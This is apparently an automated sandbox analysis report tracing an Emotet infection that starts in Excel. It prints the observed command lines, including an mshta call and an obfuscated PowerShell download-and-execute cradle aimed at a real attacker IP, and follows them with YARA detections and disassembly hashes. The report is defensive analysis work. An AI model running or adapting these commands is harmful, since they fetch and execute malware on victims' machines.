                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:21:01:18
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                  Imagebase:0x13f3d0000
                                                                                                                  File size:28253536 bytes
                                                                                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:21:01:19
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                                                                                                                  Imagebase:0x4a610000
                                                                                                                  File size:345088 bytes
                                                                                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:21:01:20
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:mshta http://91.240.118.172/gg/ff/fe.html
                                                                                                                  Imagebase:0x13f860000
                                                                                                                  File size:13824 bytes
                                                                                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:21:01:23
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                                                                  Imagebase:0x13ffa0000
                                                                                                                  File size:473600 bytes
                                                                                                                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:21:01:56
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                                                                                                  Imagebase:0x4a870000
                                                                                                                  File size:345088 bytes
                                                                                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:9
                                                                                                                  Start time:21:01:56
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                                                                                                  Imagebase:0x650000
                                                                                                                  File size:44544 bytes
                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.494656303.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:10
                                                                                                                  Start time:21:01:59
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                                                                                                                  Imagebase:0x650000
                                                                                                                  File size:44544 bytes
                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542046828.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541660738.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542478575.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541724844.0000000000821000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542228436.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541516961.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541940450.0000000002741000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542432486.0000000003031000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542188675.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542349142.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541608095.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541890184.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542388778.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542302044.0000000002EF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541702376.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542264283.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:11
                                                                                                                  Start time:21:02:16
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",bVGdzkK
                                                                                                                  Imagebase:0x650000
                                                                                                                  File size:44544 bytes
                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.544093130.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:13
                                                                                                                  Start time:21:02:22
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",DllRegisterServer
                                                                                                                  Imagebase:0x650000
                                                                                                                  File size:44544 bytes
                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578707809.0000000002821000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578772331.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578889173.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.579012623.0000000003101000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578238624.00000000003B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578430206.0000000002431000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578354929.00000000020F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578582490.0000000002781000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578396219.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578626401.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578293718.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578111273.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578532434.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.579044435.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578950230.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:14
                                                                                                                  Start time:21:02:35
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",ZDYuehCO
                                                                                                                  Imagebase:0x650000
                                                                                                                  File size:44544 bytes
                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.580707170.00000000001F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.580607139.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.581940657.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security

                                                                                                                  General

                                                                                                                  Target ID:15
                                                                                                                  Start time:21:02:39
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",DllRegisterServer
                                                                                                                  Imagebase:0x650000
                                                                                                                  File size:44544 bytes
                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672072251.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672636811.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672779840.0000000000461000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673803269.0000000002801000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674180199.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674124482.0000000002E00000.00000040.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672599547.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673644143.0000000002630000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674231548.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673769200.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672141355.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673878753.0000000002861000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673392642.0000000000BA1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674347408.0000000002FA1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673698904.0000000002661000.00000020.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673289454.0000000000611000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674038716.0000000002D01000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672197445.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673986023.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674276133.0000000002F41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673600434.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674675365.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672985189.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674444263.0000000003051000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674481357.0000000003081000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673330806.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674312422.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674404496.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674070435.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673440087.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673835028.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Executed Functions

                                                                                                                    Function 032F411A Relevance: .2, Instructions: 228COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418543494.00000000032F3000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F4000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_32f3000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1ae25d32e65c05977671369c39f00726c5a379b3512cb0a43af8a2f43b10a31b
                                                                                                                    • Instruction ID: 70b70b4003278331a3c2e2747d854babbd2902cf537cab32da1b76d1cfdcadc4
                                                                                                                    • Opcode Fuzzy Hash: 1ae25d32e65c05977671369c39f00726c5a379b3512cb0a43af8a2f43b10a31b
                                                                                                                    • Instruction Fuzzy Hash: E351F43062CA484FCB48FB1D9845A22F7D1FB5C704B5880EEE58AC7396DA64DCD18796
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 032F411A Relevance: .2, Instructions: 228COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418543494.00000000032F3000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_32f3000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1ae25d32e65c05977671369c39f00726c5a379b3512cb0a43af8a2f43b10a31b
                                                                                                                    • Instruction ID: 70b70b4003278331a3c2e2747d854babbd2902cf537cab32da1b76d1cfdcadc4
                                                                                                                    • Opcode Fuzzy Hash: 1ae25d32e65c05977671369c39f00726c5a379b3512cb0a43af8a2f43b10a31b
                                                                                                                    • Instruction Fuzzy Hash: E351F43062CA484FCB48FB1D9845A22F7D1FB5C704B5880EEE58AC7396DA64DCD18796
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 032F4310 Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418543494.00000000032F3000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F4000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_32f3000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 17281a31a910e7369ce14be9be9e1e2d0d72dc1cc6552873a080492646b7b9cb
                                                                                                                    • Instruction ID: 718d43d39e58b560a1272f93f53fea97b17f65d7f18f12e82d139fba6ea56024
                                                                                                                    • Opcode Fuzzy Hash: 17281a31a910e7369ce14be9be9e1e2d0d72dc1cc6552873a080492646b7b9cb
                                                                                                                    • Instruction Fuzzy Hash: 85D0223421C7C80FC315B73820140697BA1CB1F2C432850CA89CAC7343DD400CC18353
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 032F4310 Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418543494.00000000032F3000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_32f3000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 17281a31a910e7369ce14be9be9e1e2d0d72dc1cc6552873a080492646b7b9cb
                                                                                                                    • Instruction ID: 718d43d39e58b560a1272f93f53fea97b17f65d7f18f12e82d139fba6ea56024
                                                                                                                    • Opcode Fuzzy Hash: 17281a31a910e7369ce14be9be9e1e2d0d72dc1cc6552873a080492646b7b9cb
                                                                                                                    • Instruction Fuzzy Hash: 85D0223421C7C80FC315B73820140697BA1CB1F2C432850CA89CAC7343DD400CC18353
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 02C40FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418655141.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_2c40000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 02C40F89 Relevance: .0, Instructions: 5COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418655141.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_2c40000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 02C40F91 Relevance: .0, Instructions: 5COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418655141.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_2c40000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

